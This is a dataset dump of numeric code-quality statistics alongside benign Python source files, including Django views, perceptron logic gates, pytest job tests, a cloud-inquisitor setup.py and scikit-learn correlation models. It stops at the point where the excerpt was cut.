| 1,430
| 11,206
| 4.516783
| 0.103497
| 0.012076
| 0.024772
| 0.036848
| 0.82954
| 0.806317
| 0.77272
| 0.7512
| 0.72039
| 0.693451
| 0
| 0.08462
| 0.266018
| 11,206
| 221
| 111
| 50.705882
| 0.700669
| 0
| 0
| 0.558376
| 0
| 0
| 0.254685
| 0.061306
| 0
| 0
| 0
| 0
| 0.187817
| 1
| 0.086294
| false
| 0.010152
| 0.055838
| 0
| 0.147208
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6a361906320586374b2352e3c987520069dcef6e
| 168
|
py
|
Python
|
pageNotFound/views.py
|
loribonna/EsameLDPython
|
02f671d0813e4e3cfed5a977018ab295b8675d60
|
[
"MIT"
] | null | null | null |
pageNotFound/views.py
|
loribonna/EsameLDPython
|
02f671d0813e4e3cfed5a977018ab295b8675d60
|
[
"MIT"
] | null | null | null |
pageNotFound/views.py
|
loribonna/EsameLDPython
|
02f671d0813e4e3cfed5a977018ab295b8675d60
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def pageNotFound(request):
return HttpResponse("Page Not Found")
| 28
| 41
| 0.797619
| 22
| 168
| 6.090909
| 0.818182
| 0.149254
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136905
| 168
| 6
| 41
| 28
| 0.924138
| 0.136905
| 0
| 0
| 0
| 0
| 0.097222
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
6a49339a8e8db8543bca1cf7dffdecc3019230cd
| 534
|
py
|
Python
|
DeepLearning from Scratch 1/ch2/2.3.3 가중치와 편향 구현하기.py
|
DaeSeokSong/HobbyCoding
|
662f348442a953316347dc2fb31df1a852ac12f3
|
[
"MIT"
] | null | null | null |
DeepLearning from Scratch 1/ch2/2.3.3 가중치와 편향 구현하기.py
|
DaeSeokSong/HobbyCoding
|
662f348442a953316347dc2fb31df1a852ac12f3
|
[
"MIT"
] | null | null | null |
DeepLearning from Scratch 1/ch2/2.3.3 가중치와 편향 구현하기.py
|
DaeSeokSong/HobbyCoding
|
662f348442a953316347dc2fb31df1a852ac12f3
|
[
"MIT"
] | null | null | null |
"""2.3.3 가중치와 편향 구현하기"""
def AND(x1, x2):
x = np.array([x1, x2])
w = np.array([0.5, 0.5])
b = -0.7
tmp = np.sum(w*x) + b
if tmp <= 0: return 0
else: return 1
def NAND(x1, x2):
x = np.array([x1, x2])
# AND와 NAND는 가중치(w와 b)만 다르다
w = np.array([-0.5, -0.5])
b = 0.7
tmp = np.sum(w*x) + b
if tmp <= 0: return 0
else: return 1
def OR(x1, x2):
x = np.array([x1, x2])
w = np.array([0.5, 0.5])
b = -0.2
tmp = np.sum(w*x) + b
if tmp <= 0: return 0
else: return 1
| 18.413793
| 31
| 0.464419
| 112
| 534
| 2.214286
| 0.276786
| 0.096774
| 0.060484
| 0.084677
| 0.818548
| 0.818548
| 0.818548
| 0.754032
| 0.754032
| 0.754032
| 0
| 0.116992
| 0.327715
| 534
| 29
| 32
| 18.413793
| 0.573816
| 0.08427
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
e038a6a1f22093556aceeb486188267d48bccf43
| 321
|
py
|
Python
|
CA117/Lab_4/beststudent_31_v2.py
|
PRITI1999/OneLineWonders
|
91a7368e0796e5a3b5839c9165f9fbe5460879f5
|
[
"MIT"
] | 6
|
2016-02-04T00:15:20.000Z
|
2019-10-13T13:53:16.000Z
|
CA117/Lab_4/beststudent_31_v2.py
|
PRITI1999/OneLineWonders
|
91a7368e0796e5a3b5839c9165f9fbe5460879f5
|
[
"MIT"
] | 2
|
2016-03-14T04:01:36.000Z
|
2019-10-16T12:45:34.000Z
|
CA117/Lab_4/beststudent_31_v2.py
|
PRITI1999/OneLineWonders
|
91a7368e0796e5a3b5839c9165f9fbe5460879f5
|
[
"MIT"
] | 10
|
2016-02-09T14:38:32.000Z
|
2021-05-25T08:16:26.000Z
|
(lambda a:print("Best student: {1} {2}\nBest mark: {0}".format(*max([line.split()for line in open(a,'r')],key=lambda x:int(x[0]) if x[0].isdigit() else [print("Invalid mark %s encountered. Exiting" % x[0]), exit()])))if __import__('os').path.isfile(a)else print("ERROR: File not found! " + a))(__import__('sys').argv[1])
| 160.5
| 320
| 0.65109
| 57
| 321
| 3.526316
| 0.684211
| 0.029851
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024055
| 0.093458
| 321
| 1
| 321
| 321
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0.317757
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
e050ad968c3072ad9c1330031f17b3893a3b8ba5
| 231
|
py
|
Python
|
terrafirma/planner/apps.py
|
AlexandraAlter/django-terrafirma
|
afce5946f173aded2b4bfea78cf1b1034ec32272
|
[
"MIT"
] | null | null | null |
terrafirma/planner/apps.py
|
AlexandraAlter/django-terrafirma
|
afce5946f173aded2b4bfea78cf1b1034ec32272
|
[
"MIT"
] | null | null | null |
terrafirma/planner/apps.py
|
AlexandraAlter/django-terrafirma
|
afce5946f173aded2b4bfea78cf1b1034ec32272
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class PlannerConfig(AppConfig):
name = 'terrafirma.planner'
label = 'terrafirma_planner'
verbose_name = _('Terrafirma Planner')
| 25.666667
| 54
| 0.766234
| 26
| 231
| 6.615385
| 0.653846
| 0.296512
| 0.244186
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155844
| 231
| 8
| 55
| 28.875
| 0.882051
| 0
| 0
| 0
| 0
| 0
| 0.233766
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0ebd3478de83e65bc3ea2a9c82dd1c79bf67e25e
| 2,513
|
py
|
Python
|
tests/meltano/core/job/test_stale_job_failer.py
|
siilats/meltano
|
404605c83f441c3fc2b729e26416c6caa8b0ed0b
|
[
"MIT"
] | 122
|
2021-06-21T17:30:29.000Z
|
2022-03-25T06:21:38.000Z
|
tests/meltano/core/job/test_stale_job_failer.py
|
siilats/meltano
|
404605c83f441c3fc2b729e26416c6caa8b0ed0b
|
[
"MIT"
] | null | null | null |
tests/meltano/core/job/test_stale_job_failer.py
|
siilats/meltano
|
404605c83f441c3fc2b729e26416c6caa8b0ed0b
|
[
"MIT"
] | 21
|
2021-06-22T10:08:15.000Z
|
2022-03-18T08:57:02.000Z
|
from datetime import datetime, timedelta
import pytest
from meltano.core.job import Job
from meltano.core.job.stale_job_failer import StaleJobFailer
class TestStaleJobFailer:
@pytest.fixture
def live_job(self, session):
job = Job(job_id="test")
job.start()
job.save(session)
return job
@pytest.fixture
def stale_job(self, session):
job = Job(job_id="test")
job.start()
job.last_heartbeat_at = datetime.utcnow() - timedelta(minutes=10)
job.save(session)
return job
@pytest.fixture
def other_stale_job(self, session):
job = Job(job_id="other")
job.start()
job.last_heartbeat_at = datetime.utcnow() - timedelta(minutes=10)
job.save(session)
return job
@pytest.fixture
def complete_job(self, session):
job = Job(job_id="other")
job.start()
job.success()
job.save(session)
return job
def test_fail_stale_jobs(
self, live_job, stale_job, other_stale_job, complete_job, session
):
assert stale_job.is_stale()
assert other_stale_job.is_stale()
failer = StaleJobFailer()
failer.fail_stale_jobs(session)
session.refresh(live_job)
session.refresh(stale_job)
session.refresh(other_stale_job)
session.refresh(complete_job)
# Leaves non-stale jobs alone
assert live_job.is_running()
assert complete_job.is_complete()
# Marks all stale jobs as failed
assert stale_job.has_error()
assert not stale_job.is_stale()
assert other_stale_job.has_error()
assert not other_stale_job.is_stale()
def test_fail_stale_jobs_with_job_id(
self, live_job, stale_job, other_stale_job, complete_job, session
):
assert stale_job.is_stale()
assert other_stale_job.is_stale()
failer = StaleJobFailer(job_id=stale_job.job_id)
failer.fail_stale_jobs(session)
session.refresh(live_job)
session.refresh(stale_job)
session.refresh(other_stale_job)
session.refresh(complete_job)
# Leaves non-stale jobs alone
assert live_job.is_running()
assert complete_job.is_complete()
# Marks stale jobs with the job ID as failed
assert stale_job.has_error()
assert not stale_job.is_stale()
# Leaves stale jobs with a different job ID alone
assert other_stale_job.is_stale()
| 27.021505
| 73
| 0.651413
| 327
| 2,513
| 4.743119
| 0.159021
| 0.118633
| 0.083817
| 0.077369
| 0.814313
| 0.760799
| 0.733075
| 0.733075
| 0.691167
| 0.691167
| 0
| 0.00217
| 0.266614
| 2,513
| 92
| 74
| 27.315217
| 0.839392
| 0.070434
| 0
| 0.753846
| 0
| 0
| 0.007725
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 1
| 0.092308
| false
| 0
| 0.061538
| 0
| 0.230769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0ee1fe8af2c2998091ecd8b9201dbe5e0121df6b
| 6,707
|
py
|
Python
|
backend/setup.py
|
jtimberlake/cloud-inquisitor
|
9ab260d6c3f35d496c2d8f888f9836b5afe9d06b
|
[
"Apache-2.0"
] | 462
|
2017-11-27T20:53:25.000Z
|
2022-03-26T18:32:50.000Z
|
backend/setup.py
|
RiotGames/cloud-inquisitor
|
29a26c705381fdba3538b4efedb25b9e09b387ed
|
[
"Apache-2.0"
] | 103
|
2017-11-28T14:33:26.000Z
|
2020-11-06T20:01:11.000Z
|
backend/setup.py
|
jtimberlake/cloud-inquisitor
|
9ab260d6c3f35d496c2d8f888f9836b5afe9d06b
|
[
"Apache-2.0"
] | 58
|
2017-11-28T00:49:12.000Z
|
2022-03-26T18:32:44.000Z
|
import setuptools
setuptools.setup(
name='cloud_inquisitor',
version='3.0.0',
entry_points={
'console_scripts': [
'cloud-inquisitor = cloud_inquisitor.cli:cli'
],
'cloud_inquisitor.plugins.commands': [
'auth = cloud_inquisitor.plugins.commands.auth:Auth',
'import-saml = cloud_inquisitor.plugins.commands.saml:ImportSAML',
'list_plugins = cloud_inquisitor.plugins.commands.plugins:ListPlugins',
'scheduler = cloud_inquisitor.plugins.commands.scheduler:Scheduler',
'setup = cloud_inquisitor.plugins.commands.setup:Setup',
'userdata = cloud_inquisitor.plugins.commands.userdata:UserData',
'worker = cloud_inquisitor.plugins.commands.scheduler:Worker',
],
'cloud_inquisitor.plugins.notifiers': [
'email_notify = cloud_inquisitor.plugins.notifiers.email:EmailNotifier',
'slack_notify = cloud_inquisitor.plugins.notifiers.slack:SlackNotifier',
],
'cloud_inquisitor.plugins.types': [
'ami_type = cloud_inquisitor.plugins.types.resources:AMI',
'beanstalk_type = cloud_inquisitor.plugins.types.resources:BeanStalk',
'cloudfrontdist_type = cloud_inquisitor.plugins.types.resources:CloudFrontDist',
'dnsrecord_type = cloud_inquisitor.plugins.types.resources:DNSRecord',
'dnszone_type = cloud_inquisitor.plugins.types.resources:DNSZone',
'ebssnapshot_type = cloud_inquisitor.plugins.types.resources:EBSSnapshot',
'ebsvolume_type = cloud_inquisitor.plugins.types.resources:EBSVolume',
'ec2instance_type = cloud_inquisitor.plugins.types.resources:EC2Instance',
'rdsinstance_type = cloud_inquisitor.plugins.types.resources:RDSInstance',
's3bucket_type = cloud_inquisitor.plugins.types.resources:S3Bucket',
'vpc_type = cloud_inquisitor.plugins.types.resources:VPC'
],
'cloud_inquisitor.plugins.types.accounts': [
'AWS = cloud_inquisitor.plugins.types.accounts:AWSAccount',
'DNS: AXFR = cloud_inquisitor.plugins.types.accounts:AXFRAccount',
'DNS: CloudFlare = cloud_inquisitor.plugins.types.accounts:CloudFlareAccount',
],
'cloud_inquisitor.plugins.schedulers': [],
'cloud_inquisitor.plugins.views': [
'account_details = cloud_inquisitor.plugins.views.accounts:AccountDetail',
'account_imex = cloud_inquisitor.plugins.views.accounts:AccountImportExport',
'account_list = cloud_inquisitor.plugins.views.accounts:AccountList',
'auditlog_get = cloud_inquisitor.plugins.views.auditlog:AuditLogGet',
'auditlog_list = cloud_inquisitor.plugins.views.auditlog:AuditLogList',
'config = cloud_inquisitor.plugins.views.config:ConfigGet',
'config_import_export = cloud_inquisitor.plugins.views.config:ConfigImportExport',
'config_list = cloud_inquisitor.plugins.views.config:ConfigList',
'config_namespace_get = cloud_inquisitor.plugins.views.config:NamespaceGet',
'config_namespace_list = cloud_inquisitor.plugins.views.config:Namespaces',
'email = cloud_inquisitor.plugins.views.emails:EmailGet',
'email_list = cloud_inquisitor.plugins.views.emails:EmailList',
'log = cloud_inquisitor.plugins.views.logs:Logs',
'log_details = cloud_inquisitor.plugins.views.logs:LogDetails',
'metadata = cloud_inquisitor.plugins.views.metadata:MetaData',
'password_reset = cloud_inquisitor.plugins.views.users:PasswordReset',
'role_get = cloud_inquisitor.plugins.views.roles:RoleGet',
'role_list = cloud_inquisitor.plugins.views.roles:RoleList',
'search = cloud_inquisitor.plugins.views.search:Search',
'stats = cloud_inquisitor.plugins.views.stats:StatsGet',
'template_get = cloud_inquisitor.plugins.views.templates:TemplateGet',
'template_list = cloud_inquisitor.plugins.views.templates:TemplateList',
'user_details = cloud_inquisitor.plugins.views.users:UserDetails',
'user_list = cloud_inquisitor.plugins.views.users:UserList',
]
},
packages=setuptools.find_packages(
exclude=[
'*.tests',
'*.tests.*',
'tests.*',
'tests'
]
),
include_package_data=True,
zip_safe=False,
# Requirements for setup and installation
setup_requires=['setuptools_scm'],
install_requires=[
'Flask-Compress~=1.4',
'Flask-Migrate~=2.1',
'Flask-RESTful~=0.3',
'Flask-SQLAlchemy~=2.3',
'Flask-Script~=2.0',
'Flask~=0.12',
'Jinja2~=2.9',
'MarkupSafe~=1.0',
'PyJWT~=1.5',
'SQLAlchemy~=1.1',
'argon2-cffi~=16.3',
'boto3~=1.9',
'click~=6.7',
'enum34~=1.1',
'flake8-comprehensions~=1.4',
'flake8-deprecated~=1.2',
'flake8-pep3101~=1.1',
'flake8-quotes~=0.9',
'flake8~=3.3',
'gunicorn~=19.7',
'ipython~=6.2',
'moto~=1.3',
'munch~=2.1',
'mysqlclient~=1.3',
'pyexcel-xlsx~=0.5',
'pytest~=5.0',
'pytest-cov~=2.6',
'rainbow-logging-handler~=2.2',
'requests~=2.19',
'slackclient~=1.0',
'sqlservice~=0.20',
],
# Metadata
description='Tool to enforce ownership and data security within cloud environments',
long_description='Please see https://github.com/RiotGames/cloud-inquisitor for more information',
author='Riot Games Security',
author_email='security@riotgames.com',
url='https://github.com/RiotGames/cloud-inquisitor',
license='Apache 2.0',
classifiers=[
# Current project status
'Development Status :: 4 - Beta',
# Audience
'Intended Audience :: System Administrators',
'Intended Audience :: Information Technology',
# License information
'License :: OSI Approved :: Apache Software License',
# Supported python versions
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
# Frameworks used
'Framework :: Flask',
# Supported OS's
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX :: Linux',
'Operating System :: Unix',
# Extra metadata
'Environment :: Console',
'Natural Language :: English',
'Topic :: Security',
'Topic :: Utilities',
],
keywords='cloud security',
)
| 41.658385
| 101
| 0.635306
| 663
| 6,707
| 6.27451
| 0.331825
| 0.209135
| 0.280288
| 0.16226
| 0.404327
| 0.141827
| 0
| 0
| 0
| 0
| 0
| 0.018631
| 0.23975
| 6,707
| 160
| 102
| 41.91875
| 0.797215
| 0.025645
| 0
| 0.051852
| 0
| 0
| 0.686284
| 0.412107
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.007407
| 0.02963
| 0
| 0.02963
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0efbc69823e33452fa11d2e01ca926d4548e77bf
| 129
|
py
|
Python
|
gQuant/plugins/cusignal_plugin/greenflow_cusignal_plugin/convolution/__init__.py
|
t-triobox/gQuant
|
6ee3ba104ce4c6f17a5755e7782298902d125563
|
[
"Apache-2.0"
] | null | null | null |
gQuant/plugins/cusignal_plugin/greenflow_cusignal_plugin/convolution/__init__.py
|
t-triobox/gQuant
|
6ee3ba104ce4c6f17a5755e7782298902d125563
|
[
"Apache-2.0"
] | null | null | null |
gQuant/plugins/cusignal_plugin/greenflow_cusignal_plugin/convolution/__init__.py
|
t-triobox/gQuant
|
6ee3ba104ce4c6f17a5755e7782298902d125563
|
[
"Apache-2.0"
] | null | null | null |
from .convolve import *
from .correlate import *
from .fftconvolve import *
from .convolve2d import *
from .correlate2d import *
| 21.5
| 26
| 0.767442
| 15
| 129
| 6.6
| 0.466667
| 0.40404
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018349
| 0.155039
| 129
| 5
| 27
| 25.8
| 0.889908
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1678e70fc56062104c898fa9e2417c740e03b325
| 7,654
|
py
|
Python
|
lib/python2.7/site-packages/sklearn/gaussian_process/correlation_models.py
|
wfehrnstrom/harmonize
|
e5661d24b2021739e8ac4bf1d3a530eda4e155b3
|
[
"MIT"
] | 6,989
|
2017-07-18T06:23:18.000Z
|
2022-03-31T15:58:36.000Z
|
lib/python2.7/site-packages/sklearn/gaussian_process/correlation_models.py
|
wfehrnstrom/harmonize
|
e5661d24b2021739e8ac4bf1d3a530eda4e155b3
|
[
"MIT"
] | 1,978
|
2017-07-18T09:17:58.000Z
|
2022-03-31T14:28:43.000Z
|
lib/python2.7/site-packages/sklearn/gaussian_process/correlation_models.py
|
wfehrnstrom/harmonize
|
e5661d24b2021739e8ac4bf1d3a530eda4e155b3
|
[
"MIT"
] | 1,228
|
2017-07-18T09:03:13.000Z
|
2022-03-29T05:57:40.000Z
|
# -*- coding: utf-8 -*-
# Author: Vincent Dubourg <vincent.dubourg@gmail.com>
# (mostly translation, see implementation details)
# License: BSD 3 clause
"""
The built-in correlation models submodule for the gaussian_process module.
"""
import numpy as np
def absolute_exponential(theta, d):
"""
Absolute exponential autocorrelation model.
(Ornstein-Uhlenbeck stochastic process)::
n
theta, d --> r(theta, d) = exp( sum - theta_i * |d_i| )
i = 1
Parameters
----------
theta : array_like
An array with shape 1 (isotropic) or n (anisotropic) giving the
autocorrelation parameter(s).
d : array_like
An array with shape (n_eval, n_features) giving the componentwise
distances between locations x and x' at which the correlation model
should be evaluated.
Returns
-------
r : array_like
An array with shape (n_eval, ) containing the values of the
autocorrelation model.
"""
theta = np.asarray(theta, dtype=np.float64)
d = np.abs(np.asarray(d, dtype=np.float64))
if d.ndim > 1:
n_features = d.shape[1]
else:
n_features = 1
if theta.size == 1:
return np.exp(- theta[0] * np.sum(d, axis=1))
elif theta.size != n_features:
raise ValueError("Length of theta must be 1 or %s" % n_features)
else:
return np.exp(- np.sum(theta.reshape(1, n_features) * d, axis=1))
def squared_exponential(theta, d):
"""
Squared exponential correlation model (Radial Basis Function).
(Infinitely differentiable stochastic process, very smooth)::
n
theta, d --> r(theta, d) = exp( sum - theta_i * (d_i)^2 )
i = 1
Parameters
----------
theta : array_like
An array with shape 1 (isotropic) or n (anisotropic) giving the
autocorrelation parameter(s).
d : array_like
An array with shape (n_eval, n_features) giving the componentwise
distances between locations x and x' at which the correlation model
should be evaluated.
Returns
-------
r : array_like
An array with shape (n_eval, ) containing the values of the
autocorrelation model.
"""
theta = np.asarray(theta, dtype=np.float64)
d = np.asarray(d, dtype=np.float64)
if d.ndim > 1:
n_features = d.shape[1]
else:
n_features = 1
if theta.size == 1:
return np.exp(-theta[0] * np.sum(d ** 2, axis=1))
elif theta.size != n_features:
raise ValueError("Length of theta must be 1 or %s" % n_features)
else:
return np.exp(-np.sum(theta.reshape(1, n_features) * d ** 2, axis=1))
def generalized_exponential(theta, d):
"""
Generalized exponential correlation model.
(Useful when one does not know the smoothness of the function to be
predicted.)::
n
theta, d --> r(theta, d) = exp( sum - theta_i * |d_i|^p )
i = 1
Parameters
----------
theta : array_like
An array with shape 1+1 (isotropic) or n+1 (anisotropic) giving the
autocorrelation parameter(s) (theta, p).
d : array_like
An array with shape (n_eval, n_features) giving the componentwise
distances between locations x and x' at which the correlation model
should be evaluated.
Returns
-------
r : array_like
An array with shape (n_eval, ) with the values of the autocorrelation
model.
"""
theta = np.asarray(theta, dtype=np.float64)
d = np.asarray(d, dtype=np.float64)
if d.ndim > 1:
n_features = d.shape[1]
else:
n_features = 1
lth = theta.size
if n_features > 1 and lth == 2:
theta = np.hstack([np.repeat(theta[0], n_features), theta[1]])
elif lth != n_features + 1:
raise Exception("Length of theta must be 2 or %s" % (n_features + 1))
else:
theta = theta.reshape(1, lth)
td = theta[:, 0:-1].reshape(1, n_features) * np.abs(d) ** theta[:, -1]
r = np.exp(- np.sum(td, 1))
return r
def pure_nugget(theta, d):
"""
Spatial independence correlation model (pure nugget).
(Useful when one wants to solve an ordinary least squares problem!)::
n
theta, d --> r(theta, d) = 1 if sum |d_i| == 0
i = 1
0 otherwise
Parameters
----------
theta : array_like
None.
d : array_like
An array with shape (n_eval, n_features) giving the componentwise
distances between locations x and x' at which the correlation model
should be evaluated.
Returns
-------
r : array_like
An array with shape (n_eval, ) with the values of the autocorrelation
model.
"""
theta = np.asarray(theta, dtype=np.float64)
d = np.asarray(d, dtype=np.float64)
n_eval = d.shape[0]
r = np.zeros(n_eval)
r[np.all(d == 0., axis=1)] = 1.
return r
def cubic(theta, d):
"""
Cubic correlation model::
theta, d --> r(theta, d) =
n
prod max(0, 1 - 3(theta_j*d_ij)^2 + 2(theta_j*d_ij)^3) , i = 1,...,m
j = 1
Parameters
----------
theta : array_like
An array with shape 1 (isotropic) or n (anisotropic) giving the
autocorrelation parameter(s).
d : array_like
An array with shape (n_eval, n_features) giving the componentwise
distances between locations x and x' at which the correlation model
should be evaluated.
Returns
-------
r : array_like
An array with shape (n_eval, ) with the values of the autocorrelation
model.
"""
theta = np.asarray(theta, dtype=np.float64)
d = np.asarray(d, dtype=np.float64)
if d.ndim > 1:
n_features = d.shape[1]
else:
n_features = 1
lth = theta.size
if lth == 1:
td = np.abs(d) * theta
elif lth != n_features:
raise Exception("Length of theta must be 1 or " + str(n_features))
else:
td = np.abs(d) * theta.reshape(1, n_features)
td[td > 1.] = 1.
ss = 1. - td ** 2. * (3. - 2. * td)
r = np.prod(ss, 1)
return r
def linear(theta, d):
"""
Linear correlation model::
theta, d --> r(theta, d) =
n
prod max(0, 1 - theta_j*d_ij) , i = 1,...,m
j = 1
Parameters
----------
theta : array_like
An array with shape 1 (isotropic) or n (anisotropic) giving the
autocorrelation parameter(s).
d : array_like
An array with shape (n_eval, n_features) giving the componentwise
distances between locations x and x' at which the correlation model
should be evaluated.
Returns
-------
r : array_like
An array with shape (n_eval, ) with the values of the autocorrelation
model.
"""
theta = np.asarray(theta, dtype=np.float64)
d = np.asarray(d, dtype=np.float64)
if d.ndim > 1:
n_features = d.shape[1]
else:
n_features = 1
lth = theta.size
if lth == 1:
td = np.abs(d) * theta
elif lth != n_features:
raise Exception("Length of theta must be 1 or %s" % n_features)
else:
td = np.abs(d) * theta.reshape(1, n_features)
td[td > 1.] = 1.
ss = 1. - td
r = np.prod(ss, 1)
return r
| 26.85614
| 78
| 0.559969
| 1,035
| 7,654
| 4.06087
| 0.136232
| 0.070664
| 0.044492
| 0.064716
| 0.749465
| 0.749465
| 0.735427
| 0.727576
| 0.71901
| 0.71901
| 0
| 0.022572
| 0.328586
| 7,654
| 284
| 79
| 26.950704
| 0.795291
| 0.54821
| 0
| 0.701149
| 0
| 0
| 0.052379
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.011494
| 0
| 0.172414
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
167fa736ddf201da2a8ff33112b9163c9c9c6da7
| 34
|
py
|
Python
|
rockstarpy/__init__.py
|
yanorestes/rockstar-py
|
0e4fe54f8677903e55c60edeee5f097c6139bef2
|
[
"MIT"
] | 48
|
2018-07-24T18:55:38.000Z
|
2019-11-05T23:06:51.000Z
|
rockstarpy/__init__.py
|
yyyyyyyyyyan/rockstar-py
|
0e4fe54f8677903e55c60edeee5f097c6139bef2
|
[
"MIT"
] | 29
|
2018-07-24T23:18:15.000Z
|
2019-02-24T23:22:31.000Z
|
rockstarpy/__init__.py
|
yanorestes/rockstar-py
|
0e4fe54f8677903e55c60edeee5f097c6139bef2
|
[
"MIT"
] | 19
|
2018-07-24T22:43:29.000Z
|
2019-04-03T12:30:12.000Z
|
from .transpile import Transpiler
| 17
| 33
| 0.852941
| 4
| 34
| 7.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 34
| 1
| 34
| 34
| 0.966667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
16ace52b4ab618498ba5393fa71f714b0855addc
| 29
|
py
|
Python
|
submitter/__init__.py
|
Sorosliu1029/LeetCode
|
4aefc25a2095b6c06004d06dc9e45fa3db26dc12
|
[
"MIT"
] | 1
|
2022-01-14T07:59:49.000Z
|
2022-01-14T07:59:49.000Z
|
submitter/__init__.py
|
Sorosliu1029/LeetCode
|
4aefc25a2095b6c06004d06dc9e45fa3db26dc12
|
[
"MIT"
] | null | null | null |
submitter/__init__.py
|
Sorosliu1029/LeetCode
|
4aefc25a2095b6c06004d06dc9e45fa3db26dc12
|
[
"MIT"
] | null | null | null |
from .Submitter import submit
| 29
| 29
| 0.862069
| 4
| 29
| 6.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 29
| 1
| 29
| 29
| 0.961538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
16df631d88bd99d5c293b28124cd1c19cfa08bff
| 31
|
py
|
Python
|
rapidenv/git/__init__.py
|
innoviz-sw-infra/rapid-env
|
acc5e1e461af42b5fbb7024c0b79d4315c206fe2
|
[
"MIT"
] | 1
|
2021-02-15T20:55:49.000Z
|
2021-02-15T20:55:49.000Z
|
